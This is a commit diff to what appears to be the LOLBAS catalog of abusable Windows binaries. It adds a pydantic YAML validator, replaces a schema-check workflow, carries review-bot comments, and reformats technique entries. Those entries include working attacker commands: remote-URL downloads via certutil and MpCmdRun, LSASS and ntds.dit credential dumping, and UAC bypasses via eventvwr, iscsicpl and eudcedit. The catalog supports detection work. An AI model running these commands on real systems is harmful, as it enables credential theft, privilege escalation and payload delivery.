Improve GitHub Actions workflows (#467)

This commit is contained in:
Wietze
2025-10-02 18:14:34 +01:00
committed by GitHub
parent 2d7441bb9a
commit dcca4db04a
16 changed files with 150 additions and 188 deletions

1
.github/.yamllint vendored

@@ -8,6 +8,7 @@ rules:
trailing-spaces:
level: error
line-length:
max: 1000
level: warning
new-lines:
level: error

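--- /dev/null
+++ b/.github/workflows/validation.py
@@ -0,0 +1,120 @@
+import glob
+import os
+import sys
+from typing import List, Literal, Optional
+import yaml
+from pydantic import BaseModel, HttpUrl, RootModel, ValidationError, constr, model_validator, field_validator, ConfigDict
+# Disable datetime parsing
+yaml.SafeLoader.yaml_implicit_resolvers = {k: [r for r in v if r[0] != 'tag:yaml.org,2002:timestamp'] for k, v in yaml.SafeLoader.yaml_implicit_resolvers.items()}
+safe_str = constr(pattern=r'^([a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&%~=]|`[a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&<>%\{\}~=]+`|->)+$')
+class LolbasModel(BaseModel):
+model_config = ConfigDict(extra="forbid")
+class AliasItem(LolbasModel):
+Alias: Optional[str]
+class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]):
+pass
+class CommandItem(LolbasModel):
+Command: str
+Description: safe_str
+Usecase: safe_str
+Category: Literal['ADS', 'AWL Bypass', 'Compile', 'Conceal', 'Copy', 'Credentials', 'Decode', 'Download', 'Dump', 'Encode', 'Execute', 'Reconnaissance', 'Tamper', 'UAC Bypass', 'Upload']
+Privileges: str
+MitreID: constr(pattern=r'^T[0-9]{4}(\.[0-9]{3})?$')
+OperatingSystem: str
+Tags: Optional[List[TagItem]] = None
+class FullPathItem(LolbasModel):
+Path: constr(pattern=r'^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)<>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$')
+class CodeSampleItem(LolbasModel):
+Code: str
+class DetectionItem(LolbasModel):
+IOC: Optional[str] = None
+Sigma: Optional[HttpUrl] = None
+Analysis: Optional[HttpUrl] = None
+Elastic: Optional[HttpUrl] = None
+Splunk: Optional[HttpUrl] = None
+BlockRule: Optional[HttpUrl] = None
+@model_validator(mode="after")
+def validate_exclusive_urls(cls, values):
+url_fields = ['IOC', 'Sigma', 'Analysis', 'Elastic', 'Splunk', 'BlockRule']
+present = [field for field in url_fields if values.__dict__.get(field) is not None]
+if len(present) != 1:
+raise ValueError(f"Exactly one of the following must be provided: {url_fields}.", f"Currently set: {present or 'none'}")
+return values
+class ResourceItem(LolbasModel):
+Link: HttpUrl
+class AcknowledgementItem(LolbasModel):
+Person: str
+Handle: Optional[constr(pattern=r'^(@(\w){1,15})?$')] = None
+class MainModel(LolbasModel):
+Name: str
+Description: safe_str
+Aliases: Optional[List[AliasItem]] = None
+Author: str
+Created: constr(pattern=r'\d{4}-\d{2}-\d{2}')
+Commands: List[CommandItem]
+Full_Path: List[FullPathItem]
+Code_Sample: Optional[List[CodeSampleItem]] = None
+Detection: Optional[List[DetectionItem]] = None
+Resources: Optional[List[ResourceItem]] = None
+Acknowledgement: Optional[List[AcknowledgementItem]] = None
+if __name__ == "__main__":
+def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replace('\n', '%0A')
+yaml_files = glob.glob("yml/**", recursive=True)
+if not yaml_files:
+print("No YAML files found under 'yml/**'.")
+sys.exit(-1)
+has_errors = False
+for file_path in yaml_files:
+if os.path.isfile(file_path) and not file_path.startswith('yml/HonorableMentions/'):
+try:
+with open(file_path, 'r', encoding='utf-8') as f:
+data = yaml.safe_load(f)
+MainModel(**data)
+print(f"✅ Valid: {file_path}")
+except ValidationError as ve:
+print(f"❌ Validation error in {file_path}:\n{ve}\n")
+for err in ve.errors():
+# GitHub Actions error format
+print(err)
+path = '.'.join([str(x) for x in err.get('loc', [None])])
+msg = err.get('msg', 'Unknown validation error')
+print(f"::error file={file_path},line=1,title={escaper(err.get('type') or 'Validation error')}::{escaper(msg)}: {escaper(path)}")
+has_errors = True
+except Exception as e:
+print(f"⚠️ Error processing {file_path}: {e}\n")
+print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {escaper(e)}")
+has_errors = True
+sys.exit(-1 if has_errors else 0)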
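Review bot: In the generic `except Exception` branch, `escaper(e)` calls `.replace` on the exception object itself, so any non-pydantic failure (an empty file that makes `data` `None` and `MainModel(**data)` raise `TypeError`, or a YAML syntax error) raises `AttributeError` inside the handler, aborts the loop before the remaining files are checked and never emits the `::error` annotation; use `escaper(str(e))`. `validate_exclusive_urls` raises `ValueError` with two arguments, so pydantic renders the message as a tuple repr; join it into one string, `raise ValueError(f"Exactly one of the following must be provided: {url_fields}. Currently set: {present or 'none'}")`. The `Created` pattern `\d{4}-\d{2}-\d{2}` is unanchored, so a value with leading or trailing text still passes where the deleted pykwalify schema enforced a date type; anchor it as `constr(pattern=r'^\d{4}-\d{2}-\d{2}$')`. GitHub workflow-command property values such as `title=` must also escape `,` and `:`; the `err['type']` identifiers used there do not contain them today, so a comment on `escaper` stating that it is safe for the message position but only for comma- and colon-free property values would prevent a silent regression.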


@@ -8,6 +8,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Check file extensions
run: |
files=$(find "$GITHUB_WORKSPACE/yml" -type f -not -name "*.yml");
@@ -17,6 +18,7 @@ jobs:
exit 1;
fi
unset files
- name: Check duplicate file names
run: |
files=$(find "$GITHUB_WORKSPACE/yml/OSBinaries" "$GITHUB_WORKSPACE/yml/OtherMSBinaries" -type f -printf '%h %f\n' -iname "*.yml" | sort -t ' ' -k 2,2 -f | uniq -i -f 1 --all-repeated=separate | tr ' ' '/')
@@ -26,34 +28,12 @@ jobs:
exit 1;
fi
unset files
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint
- name: Validate Template Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: YML-Template.yml
schema: YML-Schema.yml
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml
- name: Install python dependencies
run: pip install yamllint==1.37.1 pydantic==2.11.9
- name: Lint YAML files
run: yamllint -c .github/.yamllint yml/**/
- name: Validate YAML schemas
run: python3 .github/workflows/validation.py
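Review bot: The new `Install python dependencies` step lists only yamllint and pydantic, while `validation.py` imports `yaml` directly, so PyYAML is present only as a transitive dependency of yamllint (or from the runner image) and a change upstream could break the `Validate YAML schemas` step without any change here; pin it explicitly, e.g. `run: pip install yamllint==1.37.1 pydantic==2.11.9 pyyaml==<pinned version>`. Version pins without hashes still trust the index for the resolved wheels; a `requirements.txt` installed with `pip install --require-hashes -r .github/requirements.txt` would make the install reproducible and tamper-evident. In the `Lint YAML files` step, `yml/**/` expands like `yml/*/` because `globstar` is off in the default GitHub Actions bash, and yamllint recurses into directories on its own, so `yamllint -c .github/.yamllint yml/` would be clearer and not depend on shell options. The `steps:` list this hunk edits begins outside the hunk.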


@@ -1,129 +0,0 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
format: '%Y-%M-%d'
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Tags":
type: seq
sequence:
- type: map
mapping:
regex;(^[A-Z]):
type: str
required: false
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
pattern: '^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)\<\>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$'
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
required: true
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'


@@ -35,8 +35,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\bitsadmin.exe
- Path: C:\Windows\SysWOW64\bitsadmin.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml


@@ -12,7 +12,7 @@ Commands:
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>` when not.
Usecase: Download file from Internet
Category: Download
Privileges: User
@@ -26,7 +26,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -URL {REMOTEURL:.exe}
Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>`.
Usecase: Download file from Internet
Category: Download
Privileges: User


@@ -19,6 +19,3 @@ Detection:
Resources:
- Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:


@@ -5,7 +5,7 @@ Author: Matan Bahar
Created: 2025-08-07
Commands:
- Command: eudcedit
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC Bypass
Privileges: Administrator


@@ -5,7 +5,7 @@ Author: Jacob Gajek
Created: 2018-11-01
Commands:
- Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC Bypass
Privileges: User
@@ -15,7 +15,7 @@ Commands:
- Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Category: UAC Bypass
Privileges: Administrator


@@ -4,7 +4,7 @@ Description: Microsoft iSCSI Initiator Control Panel tool
Author: Ekitji
Created: 2025-08-17
Commands:
- Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
- Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass.
Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt.
Category: UAC Bypass
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: iscsicpl.exe # SysWOW64/System32 binary
- Command: iscsicpl.exe # SysWOW64/System32 binary
Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC Bypass
@@ -24,8 +24,8 @@ Commands:
- Execute: CMD
- Application: GUI
Full_Path:
- Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
- Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
- Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
- Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
- IOC: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll


@@ -5,7 +5,7 @@ Author: Grzegorz Tworek
Created: 2022-08-31
Commands:
- Command: Ldifde -i -f {PATH:.ldf}
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.
Usecase: Download file from Internet
Category: Download
Privileges: Administrator


@@ -12,7 +12,7 @@ Commands:
MitreID: T1105
OperatingSystem: Windows 10
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.
Usecase: Download file
Category: Download
Privileges: User


@@ -5,7 +5,7 @@ Author: 'Elliot Killick'
Created: 2021-08-22
Commands:
- Command: OneDriveStandaloneUpdater
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`.
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
Category: Download
Privileges: User


@@ -5,21 +5,21 @@ Author: 'John Dwyer'
Created: 2022-05-18
Commands:
- Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Description: Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
Usecase: Dump process by PID.
Category: Dump
Privileges: User
MitreID: T1003
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
Usecase: Dump LSASS process.
Category: Dump
Privileges: Administrator
MitreID: T1003.001
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
Usecase: Dump LSASS process mutliple times.
Category: Dump
Privileges: Administrator


@@ -15,7 +15,7 @@ Commands:
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
- Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
Description: Mounting the snapshot with its GUID
Usecase: Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
Usecase: Mounting the snapshot to access the ntds.dit with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
Category: Dump
Privileges: Administrator
MitreID: T1003.003
@@ -29,7 +29,7 @@ Commands:
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
- Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
Description: Mounting with snapshot identifier
Usecase: Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
Usecase: Mounting the snapshot identifier 1 and accessing it with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
Category: Dump
Privileges: Administrator
MitreID: T1003.003
@@ -51,11 +51,6 @@ Detection:
- IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
- IOC: Event ID 4656
- IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
- Analysis:
- Sigma:
- Elastic:
- Splunk:
- BlockRule:
Resources:
- Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358
- Link: https://www.netwrix.com/ntds_dit_security_active_directory.html


@@ -5,7 +5,7 @@ Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: VisualUiaVerifyNative.exe
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
Description: Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User